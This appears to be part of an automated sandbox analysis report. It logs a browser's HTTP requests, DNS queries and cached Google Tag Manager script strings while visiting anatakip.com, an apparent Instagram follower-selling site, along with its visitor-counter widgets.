Source: global trafficHTTP traffic detected: GET /assets/logo/logo.png HTTP/1.1Host: anatakip.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://anatakip.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01; _gid=GA1.2.1885107992.1716764258; _ga_T1K5FR27Q6=GS1.1.1716764274.1.1.1716764287.0.0.0; _ga=GA1.2.1095029423.1716764258
Source: global trafficHTTP traffic detected: GET /widget/instamark.png HTTP/1.1Host: whos.amung.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://anatakip.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /classic/14/1402.png HTTP/1.1Host: widgets.amung.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://anatakip.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /widget/anatakipx.png HTTP/1.1Host: whos.amung.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://anatakip.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /classic/14/1402.png HTTP/1.1Host: widgets.amung.usConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /login HTTP/1.1Host: anatakip.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01; _gid=GA1.2.1885107992.1716764258; _ga_T1K5FR27Q6=GS1.1.1716764274.1.1.1716764294.0.0.0; _ga=GA1.2.1095029423.1716764258
Source: global trafficHTTP traffic detected: GET /translate_a/element.js?cb=googleTranslateElementInit HTTP/1.1Host: translate.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIk6HLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://anatakip.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /widget/instamark.png HTTP/1.1Host: whos.amung.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://anatakip.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /classic/14/1405.png HTTP/1.1Host: widgets.amung.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://anatakip.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /classic/14/1405.png HTTP/1.1Host: widgets.amung.usConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tools HTTP/1.1Host: anatakip.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01; _gid=GA1.2.1885107992.1716764258; _ga_T1K5FR27Q6=GS1.1.1716764274.1.1.1716764294.0.0.0; _ga=GA1.2.1095029423.1716764258
Source: global trafficHTTP traffic detected: GET /assets/logo/logo.png HTTP/1.1Host: anatakip.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://anatakip.com/toolsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01; _gid=GA1.2.1885107992.1716764258; _ga_T1K5FR27Q6=GS1.1.1716764274.1.1.1716764294.0.0.0; _ga=GA1.2.1095029423.1716764258
Source: global trafficHTTP traffic detected: GET /widget/instamark.png HTTP/1.1Host: whos.amung.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://anatakip.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /widget/anatakipx.png HTTP/1.1Host: whos.amung.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://anatakip.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /classic/14/1406.png HTTP/1.1Host: widgets.amung.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://anatakip.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /classic/00/55.png HTTP/1.1Host: widgets.amung.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://anatakip.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /classic/14/1406.png HTTP/1.1Host: widgets.amung.usConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /classic/00/55.png HTTP/1.1Host: widgets.amung.usConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tools/send-follower HTTP/1.1Host: anatakip.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://anatakip.com/toolsAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01; _gid=GA1.2.1885107992.1716764258; _ga_T1K5FR27Q6=GS1.1.1716764274.1.1.1716764311.0.0.0; _ga=GA1.2.1095029423.1716764258
Source: global trafficHTTP traffic detected: GET /packages HTTP/1.1Host: anatakip.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01; _gid=GA1.2.1885107992.1716764258; _ga_T1K5FR27Q6=GS1.1.1716764274.1.1.1716764311.0.0.0; _ga=GA1.2.1095029423.1716764258
Source: global trafficHTTP traffic detected: GET /assets/logo/logo.png HTTP/1.1Host: anatakip.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://anatakip.com/tools/send-followerAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01; _gid=GA1.2.1885107992.1716764258; _ga=GA1.2.1095029423.1716764258; _ga_T1K5FR27Q6=GS1.1.1716764274.1.1.1716764313.0.0.0
Source: global trafficHTTP traffic detected: GET /widget/instamark.png HTTP/1.1Host: whos.amung.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://anatakip.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /widget/anatakipx.png HTTP/1.1Host: whos.amung.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://anatakip.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/keep-session HTTP/1.1Host: anatakip.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: application/json, text/javascript, */*; q=0.01X-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://anatakip.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01; _gid=GA1.2.1885107992.1716764258; _ga=GA1.2.1095029423.1716764258; _ga_T1K5FR27Q6=GS1.1.1716764274.1.1.1716764313.0.0.0
Source: global trafficHTTP traffic detected: GET /widget/instamark.png HTTP/1.1Host: whos.amung.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://anatakip.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /widget/anatakipx.png HTTP/1.1Host: whos.amung.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://anatakip.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /assets/logo/logo.png HTTP/1.1Host: anatakip.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://anatakip.com/packagesAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01; _gid=GA1.2.1885107992.1716764258; _ga=GA1.2.1095029423.1716764258; _ga_T1K5FR27Q6=GS1.1.1716764274.1.1.1716764313.0.0.0
Source: global trafficHTTP traffic detected: GET /classic/13/1398.png HTTP/1.1Host: widgets.amung.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://anatakip.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/keep-session HTTP/1.1Host: anatakip.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01; _gid=GA1.2.1885107992.1716764258; _ga_T1K5FR27Q6=GS1.1.1716764274.1.1.1716764314.0.0.0; _ga=GA1.2.1095029423.1716764258
Source: global trafficHTTP traffic detected: GET /classic/13/1398.png HTTP/1.1Host: widgets.amung.usConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /blog HTTP/1.1Host: anatakip.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01; _gid=GA1.2.1885107992.1716764258; _ga_T1K5FR27Q6=GS1.1.1716764274.1.1.1716764314.0.0.0; _ga=GA1.2.1095029423.1716764258
Source: global trafficHTTP traffic detected: GET /assets/logo/logo.png HTTP/1.1Host: anatakip.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://anatakip.com/blogAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01; _gid=GA1.2.1885107992.1716764258; _ga_T1K5FR27Q6=GS1.1.1716764274.1.1.1716764314.0.0.0; _ga=GA1.2.1095029423.1716764258
Source: global trafficHTTP traffic detected: GET /widget/instamark.png HTTP/1.1Host: whos.amung.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://anatakip.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /widget/anatakipx.png HTTP/1.1Host: whos.amung.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://anatakip.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /classic/14/1453.png HTTP/1.1Host: widgets.amung.usConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://anatakip.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /classic/14/1453.png HTTP/1.1Host: widgets.amung.usConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: chromecache_188.2.drString found in binary or memory: Math.round(p);u["gtm.videoCurrentTime"]=Math.round(q);u["gtm.videoElapsedTime"]=Math.round(f);u["gtm.videoPercent"]=r;u["gtm.videoVisible"]=t;return u},bk:function(){e=Db()},pd:function(){d()}}};var ic=ma(["data-gtm-yt-inspected-"]),GC=["www.youtube.com","www.youtube-nocookie.com"],HC,IC=!1; equals www.youtube.com (Youtube)
Source: chromecache_188.2.drString found in binary or memory: e||f||g.length||h.length))return;var n={Wg:d,Ug:e,Vg:f,Lh:g,Mh:h,xe:m,Ab:b},p=G.YT,q=function(){OC(n)};if(p)return p.ready&&p.ready(q),b;var r=G.onYouTubeIframeAPIReady;G.onYouTubeIframeAPIReady=function(){r&&r();q()};I(function(){for(var t=H.getElementsByTagName("script"),v=t.length,u=0;u<v;u++){var w=t[u].getAttribute("src");if(RC(w,"iframe_api")||RC(w,"player_api"))return b}for(var y=H.getElementsByTagName("iframe"),x=y.length,B=0;B<x;B++)if(!IC&&PC(y[B],n.xe))return yc("https://www.youtube.com/iframe_api"), equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: instahilecin.net
Source: global trafficDNS traffic detected: DNS query: instahilecin.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: anatakip.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: whos.amung.us
Source: global trafficDNS traffic detected: DNS query: widgets.amung.us
Source: global trafficDNS traffic detected: DNS query: translate.google.com
Source: unknownHTTP traffic detected: POST /report/v4?s=MSO4u6hhEz8Hcno9nmUVRoQV5Qx3caGuGDqr6nuFxeLRl3IERZafoidcDHs62aIt1%2BPR7owy2Rj94S%2BN%2FWaHXLGCtf3ilabN1y8GWxzZChXxA2zGh%2FsaQuA76w9pEhk%3D HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 422Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
